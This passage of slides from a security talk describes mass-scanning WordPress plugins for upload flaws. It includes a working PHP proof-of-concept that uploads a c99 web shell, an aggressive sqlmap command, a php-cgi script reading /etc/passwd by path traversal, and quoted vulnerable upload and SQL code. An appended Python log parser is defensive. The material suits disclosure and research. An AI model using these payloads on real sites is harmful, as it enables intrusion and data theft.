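    print(summarize([ferret(SAMPLE_UPLOAD), ferret(SAMPLE_GUARDED)]))
```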
15. Semi Automatic
• git pull https://plugins.svn.wordpress.org
• Scraped plugins off wordpress.org
• Downloaded 36,000 plugins
• About 20 GB of data
• upload.php or download.php
• Use Ferret v1.0 to quickly examine lots of files
• Profit! Err, get some CVEs

17. Ferret First Run
• wp-powerplaygallery v3.3
• Flagged for user input with no access controls
• Accesses WordPress API calls
• Loads WordPress functions via require_once()
• Code examination turns up RFI and Blind SQLi!

18. wp-powerplaygallery RFI Code
143: if (!empty($_FILES)) {
144:   if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
145:     die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."} , "id" : "id"}');
146:   }
147:
148:   // Read binary input stream and append it to temp file
149:   if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150:     die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
151:   }
...
158:   while ($buff = fread($in, 4096)) {
159:     fwrite($out, $buff);
160:   }

19. wp-powerplaygallery SQLi code
131: $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
133: $wpdb->query($query);

20. RFI Exploit Requirements
• POST request
• Variable albumid must point at existing album in database
• File to upload must exist locally
• Use c99 shell as our payload
• file variable contains payload with local full path
• name variable contains our filename

21. PoC Exploit
<?php
/* Remote shell upload exploit for wp-powerplaygallery v3.3 */
/* Larry W. Cashdollar @_larry0
   6/27/2015
   albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
   but you can enumerate these by using curl, and looking for redirect 301 responses:
   e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
   ->301 exists else 404 doesn't.
   shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/

$target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
$post = array('albumid'=>'1' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>

22. Blind SQLi Exploit
• Sqlmap
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql --level 5 --risk 3

23. Lazy Exploits
• Started using php-cgi to test exploits
• The script Poc.sh:
#!/bin/sh
export GATEWAY_INTERFACE=CGI/1.1
export PATH_TRANSLATED=UserSettings.php
export QUERY_STRING=network=../../../../../../../../etc/passwd
export REDIRECT_STATUS=CGI
export REQUEST_METHOD=GET
php-cgi ./plugin/buddystream/extensions/default/templates/UserSettings.php

$ ./Poc.sh

24. Pitfalls of Exploitation
• Exploitable code is a class and isn’t reachable*
• Code uses WordPress functions or functions from other segments of code with no includes
• Code is incomplete or just broken
• Someone discovered it last year
25. Fatal Errors
• [Thu Aug 06 07:22:58 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function trailingslashit() in /usr/share/wordpress/wp-content/plugins/ckeditor-for-wordpress/ckeditor_class.php on line 27
• [Sun Aug 02 13:55:06 2015] [error] [client 192.168.0.2] PHP Fatal error: require_once(): Failed opening required '/etc/wordpress/wp-settings.php' (include_path='.:/usr/share/php:/usr/share/pear') in /etc/wordpress/config-www.vapidlabs.com.php on line 90
• [Sun Aug 02 19:28:11 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
• [Sun Aug 02 19:28:24 2015] [error] [client 192.168.0.16] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
• [Sun Aug 02 19:28:28 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
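The fatal errors above are also a detection signal for the site owner: a WordPress function that is undefined inside a plugin file means the file was executed directly, outside the WordPress bootstrap, which is exactly the access pattern the deck hunts for. This added Python parser (not part of the deck) reads error-log lines in the slide's format and groups such events by client and plugin; it assumes the classic Apache 2.2 `[client IP]` error_log layout shown on the slide and uses the slide's five lines as sample input.

```python
"""Defender's view of the slide-25 fatal errors (added example, not part of the
deck): 'Call to undefined function' inside a wp-content/plugins/ path means the
script ran without WordPress loaded, i.e. it was requested directly."""
import re
from collections import Counter

# Classic Apache 2.2 error_log layout as shown on the slide (assumed format).
LOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[\d.]+)\] "
    r"PHP Fatal error: +(?P<msg>.*?) in (?P<path>\S+) on line (?P<line>\d+)")
PLUGIN_RE = re.compile(r"/wp-content/plugins/(?P<plugin>[^/]+)/")

def parse(line):
    """Split one error_log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def direct_access_events(log_lines):
    """Return (client, plugin, path) for each fatal that indicates a plugin file
    ran without WordPress loaded: an undefined function in a plugins/ path."""
    events = []
    for line in log_lines:
        rec = parse(line)
        if rec is None:
            continue
        plugin = PLUGIN_RE.search(rec["path"])
        if plugin and rec["msg"].startswith("Call to undefined function"):
            events.append((rec["client"], plugin.group("plugin"), rec["path"]))
    return events

def probe_counts(log_lines):
    """Count events per (client, plugin); one client hitting several plugin
    scripts this way looks like the scanning described in the deck."""
    return Counter((c, p) for c, p, _ in direct_access_events(log_lines))

# The five lines from slide 25, used here as sample input.
SAMPLE_LOG = [
    "[Thu Aug 06 07:22:58 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function trailingslashit() in /usr/share/wordpress/wp-content/plugins/ckeditor-for-wordpress/ckeditor_class.php on line 27",
    "[Sun Aug 02 13:55:06 2015] [error] [client 192.168.0.2] PHP Fatal error: require_once(): Failed opening required '/etc/wordpress/wp-settings.php' (include_path='.:/usr/share/php:/usr/share/pear') in /etc/wordpress/config-www.vapidlabs.com.php on line 90",
    "[Sun Aug 02 19:28:11 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20",
    "[Sun Aug 02 19:28:24 2015] [error] [client 192.168.0.16] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20",
    "[Sun Aug 02 19:28:28 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20",
]

if __name__ == "__main__":
    for (client, plugin), n in probe_counts(SAMPLE_LOG).most_common():
        print(f"{client:14} {plugin:24} {n} direct-access fatal(s)")
```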
26. Vulnerable and Broken
<?php
$uploaddir = 'uploads/';  // This needs to be full path
$file = $uploaddir . basename($_FILES['uploadfile']['name']);
if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)) {
  echo "success";
} else {
  echo "error";
}
?>

27. Oddities
• Return local IP address of server
• Prints the FULL path of the webserver
• Plugin that downloads itself?!

28. Statistics
• 20 CVEs
• 26* vulnerabilities found
• 6 were previously discovered and not included*
• All in all 32 vulnerabilities discovered
• Dozens of known exploitable vulnerabilities remain unpatched
* I now google ‘<pluginname> vulnerability’ before bothering to document

29. Improvements
• Parse PHP scripts checking for reachable code
• Use RIPS v1.0 (thanks Chad!)
• Circle back and examine vulnerabilities that require login to WP for exploitation

31. Who Am I
• 15 years at Akamai Technologies
• Hobbyist Vulnerability Researcher
• 75+ CVEs
• Formerly Unix Systems Administrator, 17 years
• Penetration Tester back in the late 90s
• Enjoy Writing and Breaking Code